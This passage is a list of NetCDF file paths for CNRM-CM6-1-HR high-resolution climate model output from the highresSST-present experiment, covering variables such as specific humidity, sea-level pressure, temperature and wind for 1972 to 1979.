'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197705010000-197705312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197512010000-197512312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197706010000-197706302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197707010000-197707312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197708010000-197708312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801010000-197801312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197709010000-197709302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197710010000-197710312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197802010000-197802282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197711010000-197711302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197803010000-197803312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197712010000-197712312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197804010000-197804302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197805010000-197805312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197806010000-197806302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197807010000-197807312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197808010000-197808312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197809010000-197809302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197810010000-197810312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197811010000-197811302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197812010000-197812312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901010000-197901312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197902010000-197902282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197903010000-197903312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197904010000-197904302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197905010000-197905312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197906010000-197906302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197907010000-197907312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197908010000-197908312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197909010000-197909302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197910010000-197910312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197911010000-197911302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197912010000-197912312359.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720101-19721231.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730101-19731231.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740101-19741231.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750101-19751231.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201010000-197201312359.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760101-19761231.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197204010000-197204302359.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770101-19771231.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197209010000-197209302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197211010000-197211302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197212010000-197212312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301010000-197301312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197302010000-197302282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197303010000-197303312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197304010000-197304302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197305010000-197305312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197306010000-197306302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197307010000-197307312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197308010000-197308312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197309010000-197309302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197310010000-197310312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197311010000-197311302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197312010000-197312312359.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780101-19781231.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790101-19791231.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197202010000-197202292359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197204010000-197204302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197205010000-197205312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197206010000-197206302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197207010000-197207312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197210010000-197210312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197211010000-197211302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197212010000-197212312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301010000-197301312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197302010000-197302282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197303010000-197303312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197304010000-197304302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197305010000-197305312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197306010000-197306302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197307010000-197307312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197308010000-197308312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197309010000-197309302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197310010000-197310312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197311010000-197311302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197312010000-197312312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401010000-197401312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197402010000-197402282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197403010000-197403312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197404010000-197404302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197405010000-197405312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197406010000-197406302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197407010000-197407312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197408010000-197408312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197409010000-197409302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197410010000-197410312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197411010000-197411302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197412010000-197412312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501010000-197501312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197502010000-197502282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197503010000-197503312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197504010000-197504302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197505010000-197505312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197506010000-197506302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197507010000-197507312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197508010000-197508312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197509010000-197509302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197510010000-197510312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197511010000-197511302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197512010000-197512312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601010000-197601312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197602010000-197602292359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197603010000-197603312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197604010000-197604302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197605010000-197605312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197606010000-197606302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197607010000-197607312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197608010000-197608312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197609010000-197609302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197610010000-197610312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197611010000-197611302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197612010000-197612312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701010000-197701312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197702010000-197702282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197703010000-197703312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197704010000-197704302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197705010000-197705312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197706010000-197706302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197707010000-197707312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197708010000-197708312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197709010000-197709302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197710010000-197710312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197711010000-197711302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197712010000-197712312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801010000-197801312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197802010000-197802282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197803010000-197803312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197804010000-197804302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197805010000-197805312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197806010000-197806302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197807010000-197807312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197808010000-197808312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197809010000-197809302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197810010000-197810312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197811010000-197811302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197812010000-197812312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901010000-197901312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197902010000-197902282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197903010000-197903312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197904010000-197904302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197905010000-197905312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197906010000-197906302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197907010000-197907312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197908010000-197908312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197909010000-197909302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197910010000-197910312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197911010000-197911302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197912010000-197912312359.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730101-19731231.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197202010000-197202292359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197203010000-197203312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197205010000-197205312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197206010000-197206302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197207010000-197207312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197208010000-197208312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197209010000-197209302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197210010000-197210312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301010000-197301312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197302010000-197302282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197303010000-197303312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197304010000-197304302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197305010000-197305312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197306010000-197306302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197307010000-197307312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197308010000-197308312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197309010000-197309302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197310010000-197310312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197311010000-197311302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197312010000-197312312359.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201-197212.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301-197312.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401010000-197401312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197402010000-197402282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197403010000-197403312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197404010000-197404302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197405010000-197405312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197406010000-197406302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197407010000-197407312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197408010000-197408312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197409010000-197409302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197410010000-197410312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197411010000-197411302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197412010000-197412312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501010000-197501312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197502010000-197502282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197503010000-197503312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197504010000-197504302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197505010000-197505312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197506010000-197506302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197507010000-197507312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197508010000-197508312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197509010000-197509302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197510010000-197510312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197511010000-197511302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197512010000-197512312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601010000-197601312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197602010000-197602292359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197603010000-197603312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197604010000-197604302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197605010000-197605312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197606010000-197606302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197607010000-197607312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197608010000-197608312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197609010000-197609302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197610010000-197610312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197611010000-197611302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197612010000-197612312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701010000-197701312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197702010000-197702282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197703010000-197703312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197704010000-197704302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197705010000-197705312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197706010000-197706302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197707010000-197707312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197708010000-197708312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197709010000-197709302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197710010000-197710312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801010000-197801312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197711010000-197711302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197802010000-197802282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197712010000-197712312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197803010000-197803312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197804010000-197804302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197805010000-197805312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197806010000-197806302359.nc',
